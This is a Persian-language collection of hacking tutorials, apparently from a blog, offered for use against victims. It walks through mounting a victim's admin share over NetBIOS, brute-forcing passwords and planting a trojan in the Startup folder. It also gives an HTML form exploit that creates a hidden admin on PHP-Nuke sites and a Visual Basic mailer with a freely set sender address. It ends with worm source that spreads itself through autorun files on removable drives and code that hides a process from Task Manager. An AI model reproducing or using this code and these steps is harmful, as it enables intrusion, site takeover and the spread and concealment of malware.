نفوذ به سیستم از طریق NetBios

با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید )

حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.




<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>



خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!

این هم یک بحث در مورد میل سندر با ویژوال بیسیک !

سلام
این هم یک بحث در مورد میل سندر با ویژوال بیسیک !

خوب اول Object های زیر را در فرمتون ایجاد کنین :

6 عدد Text Box با نام های :

txtToEmailAddress
txtFromEmailAddress
txtFromName
txtEmailSubject
txtEmailServer
txtMessage

و یک Button با نام CmdSendMail
و از طریق Components یک Winsock control به فرم اضافه می کنین و اسمش هم به صورت پیش فرض Winsock1 هستش
یک label هم برای دیدن Status برنامه ایجاد می کنیم که اسمش را StatusTxt می ذاریم
در قمست General فرم سه عدد متغیر تعریف می کنیم به این صورت:

کد:

Dim Response As String
Dim Start As Single, Tmr As Single

سپس در قسمت رویداد های Winsock کد زیر را اضافه می کنیم "

کد:

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
    Winsock1.GetData Response
End Sub

حالا یک Sub برای چک کردن و متوجه شدن Error های موجود در Smtp برنامه ایجاد می کنیم که برای اینکار کد زیر را وارد کنین :

کد:

Sub WaitFor(ResponseCode As String)
    Start = Timer
    While Len(Response) = 0
        Tmr = Start - Timer
        DoEvents
        If Tmr > 50 Then
            MsgBox "SMTP service error, timed out while waiting for response", 64, MsgTitle
            Exit Sub
        End If
    Wend
    While Left(Response, 3) <> ResponseCode
        DoEvents
        If Tmr > 50 Then
           MsgBox "SMTP service error, impromper response code. Code should have been: " + ResponseCode + " Code recieved: " + Response, 64, MsgTitle
           Exit Sub
        End If
    Wend
    Response = ""
End Sub

البته این Sub یک کار دیگه هم می کنه و اون اینه که یک تاخیر هم ایجاد می کنه !

حالا به قسمت اصلی برنامه می رسیم که ایجاد Sub فرستادن mail هستش که برای این کار کد زیر را وارد می کنیم :

کد:

Sub SendEmail(MailServerName As String, FromName As String, FromEmailAddress As String, ToName As String, ToEmailAddress As String, EmailSubject As String, EmailBodyOfMessage As String)
Dim DateNow As String
Dim first As String, Second As String, Third As String
Dim Fourth As String, Fifth As String, Sixth As String
Dim Seventh As String
With Winsock1
    If .State = sckClosed Then
        DateNow = Format(Date, "Ddd") & ", " & Format(Date, "dd Mmm YYYY") & " " & Format(Time, "hh:mm:ss") & "" & " -0600"
        first = "mail from: " & FromEmailAddress & vbCrLf
        Second = "rcpt to: " & ToEmailAddress & vbCrLf
        Third = "Date: " & DateNow & vbCrLf
        Fourth = "From: """ & FromName & """ <" & FromEmailAddress & ">" + vbCrLf
        Fifth = "To: " & ToNametxt & vbCrLf
        Sixth = "Subject: " & EmailSubject & vbCrLf
        Seventh = EmailBodyOfMessage & vbCrLf
        Ninth = "X-Mailer: STMP Sender" & vbCrLf
        .LocalPort = 0
        .Protocol = sckTCPProtocol
        .RemoteHost = MailServerName
        .RemotePort = 25
        .Connect
        WaitFor ("220")
        StatusTxt.Caption = "Connecting...."
        .SendData ("HELO EnterComputerNameHere" & vbCrLf)
        WaitFor ("250")
        StatusTxt.Caption = "Connected"

        .SendData (first)
        StatusTxt.Caption = "Sending Message"

        WaitFor ("250")
        .SendData (Second)
        WaitFor ("250")
        .SendData ("data" & vbCrLf)
        WaitFor ("354")
        .SendData (Fourth & Third & Ninth & Fifth & Sixth & vbCrLf)
        .SendData (Seventh & vbCrLf)
        .SendData ("." & vbCrLf)
        WaitFor ("250")
        .SendData ("quit" & vbCrLf)
        StatusTxt.Caption = "Disconnecting"

        WaitFor ("221")
        .Close
    Else
        MsgBox (Str(.State))
    End If
End With
End Sub

و حالا برای فرستادن ایمیل کافی که در Button این کد را اضافه کنین :

کد:

Private Sub CmdSendMail_Click()
    SendEmail txtEmailServer.Text, txtFromName.Text, txtFromEmailAddress.Text, txtToEmailAddress.Text, txtToEmailAddress.Text, txtEmailSubject.Text, txtMessage.Text
    StatusTxt.Caption = "Mail Sent"
    Beep
    Close
End Sub

و حالا با اجرای برنامه Email که شما همه چیزش را به صورت دستی Set می کنین Send می شود .
اما توضیح در مورد چندتا از کدهای به کاررفته:

Winsock1_DataArrival
این کد چک می کنه چه درخواستی برای برنامه فرستاده می شود !


If .State = sckClosed Then
چک می کنه که Socket که همون winsock محسوب می شود اگه بسته باشد کاری انجام دهد که اینجا شما در کدتون دستور های متعددی بهش دادین



first = "mail from: " & FromEmailAddress & vbCrLf
ایمیل شخص فرستنده را می گیره



Second = "rcpt to: " & ToEmailAddress & vbCrLf
ایمیل کسی را که می خواهین براش میل بفرستین را می گیره




Fourth = "From: """ & FromName & """ <" & FromEmailAddress & ">" + vbCrLf
اسم شخص فرسنتده را می گیره



.RemotePort = 25
پرت smtp را برای winsock ست می کنه

::..::••:: کپی ویروس در حافظه های جانبی مثل رم موبایل و فلش ( آم

دوستان عزیز با استفاده از این کد شاید قدیمی ولی کاربردی می توانید ویروس خود را هنگامی که کاربر رم(حافظه جانبی مثل رم موبایل یا فلش ها و MP3 Player) را به رایانه متصل کرد،کپی کنید.دستورات این ویروس به این صورت می باشند که هر چند ثانیه یکبار تمامی درایو ها از جمله درایو های خود هارد و دیگر درایو ها که گفته شد را چک می کند و در صورت حاضر بودن آنها ویروس را در آن کپی می کند.برای اسفاده از این کد نیاز به ایجاد یک Timer به نام tmrRamDisk دارید.پس از ایجاد تایمر فقط برنامه را کامپایل کرده و اجرا کنید.

کدها:

Private Sub tmrRamDisk_Timer() On Error Resume Next 'For Test This Code Create a Timer with Name of 'tmrRamDisk' 'then Set the Interval Property to '6000' (Means Check the Drives 'Every 6 Seconds.) ' 'Created by X$X Team.Please Don't Remove this Comment. 'This Code is Used in IRANX Virus that Created By X$X Team, 'I Show it to you Only For Learn,OK ? Static Drvs(26) 'Create an Object Link to FileSystem Commands Set Fso=CreateObject("Scripting.FileSystemObject") 'Put Drives Names in the Array if Array was Empty If CStr(Drvs(0)) = "" Then a = 0 For Each Dr In Fso.Drives If Dr.DriveType = 5 Or Dr.DriveType = 2 Or Dr.DriveType = 3 Then Drvs(a) = Dr a = a + 1 End If Next End If 'Check Every Drive to Copy the Virus to It: For Each Drv In Drvs 'If Before the Virus Copied to The Drive Then Goes for Next Drive If Fso.fileExists(Drv & "\AUTORUN.INF") = True And Fso.fileExists(Drv & "\BOOT.EXE") = True Then GoTo nx If Fso.getDrive(Drv).isReady = True Then 'If Drive was Ready then Copy 'Virus in it. aut = "[AUTORUN]" & vbCrLf & "shell\open\command=boot.exe" & vbCrLf & "shell\explore\command=boot.exe" & vbCrLf & "shell\find\command=boot.exe" 'Remove Last File of AUTORUN.INF If Fso.fileExists(Drv & "\AUTORUN.INF") = True Then SetAttr Drv & "\AUTORUN.INF", vbArchive Fso.DeleteFile Drv & "\AUTORUN.INF", True End If 'Remove Last File of BOOT.EXE (Main Virus) If Fso.fileExists(Drv & "\BOOT.EXE") = True Then SetAttr Drv & "\BOOT.EXE", vbArchive Fso.DeleteFile Drv & "\BOOT.EXE", True End If Fso.createTextFile(Drv & "\AUTORUN.INF").write aut MyPath = App.Path & "\" & App.EXEName & ".exe" Fso.CopyFile MyPath, Drv & "\BOOT.EXE", True SetAttr Drv & "\BOOT.EXE", vbHidden + vbSystem 'Set Hidden and System Attr for Maximum Hiding SetAttr Drv & "\AUTORUN.INF", vbHidden + vbSystem 'Set Hidden and System Attr for Maximum Hiding End If nx: DoEvents Next 'WWW.XSX-VBS.Mihanblog.COM End Sub

مخفی کردن عالی ویروس از مدیریت برنامه ها(Task Manager) ( آموزش ه

با استفاده از این کدها می توانید نام برنامه خود را در قسمت Processes از برنامه Task Manager مخفی نگه دارید.بسیار زیاد از این کدها اسفاده می شود.

شما باید کد 1 را کپی و در یک ماژول(Module) ذخیره کرده و در برنامه اصلی یک شی Timer ساخته و در آن روال کد زیر را صدا بزنید مانند کد 2.

کد 1:

Public Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long Public Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Public Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long Public Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Public Sub Hide_Process(Name As String) 'Created By X$X Team (Please Don't Remove This Topic and Write Your Own Name) On Error Resume Next Dim pName As Long Dim pType As Long Dim l As Long Dim Tid As Long Dim hTid As Long Dim pid As Long Dim i As Long Dim hProcess As Long Dim f As bkh Dim s As String Dim bkh() As Byte h = FindWindow(vbNullString, "Windows Task Manager") If h = 0 Then Exit Sub KillTimer h, 0 h = FindWindowEx(h, 0, "#32770", vbNullString) h = FindWindowEx(h, 0, "SysListView32", vbNullString) f.flag = 8 Or &H20 Call GetWindowThreadProcessId(h, pid) hProcess = OpenProcess(1082, 0, pid) bkh = StrConv(Name, vbFromUnicode) pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4) WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l f.psz = pName pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4) WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l i = SendMessage(h, &H1000 + 13, 0, pType) If i <> -1 Then SendMessage h, &H1000 + 8, i, 0 VirtualFreeEx hProcess, pType, Len(f), &H8000 VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000 CloseHandle pid 'WWW.XSX-VBS.Mihanblog.COM End Sub کد 2: (مربوط به فرم یا برنامه اصلی که نیاز به یک تایمر دارد برای صدا زدن مدام روال کد 1) Private Sub tmrHiddenEXE_Timer() On Error Resume Next Hide_Process App.EXEName & ".exe" DoEvents End Sub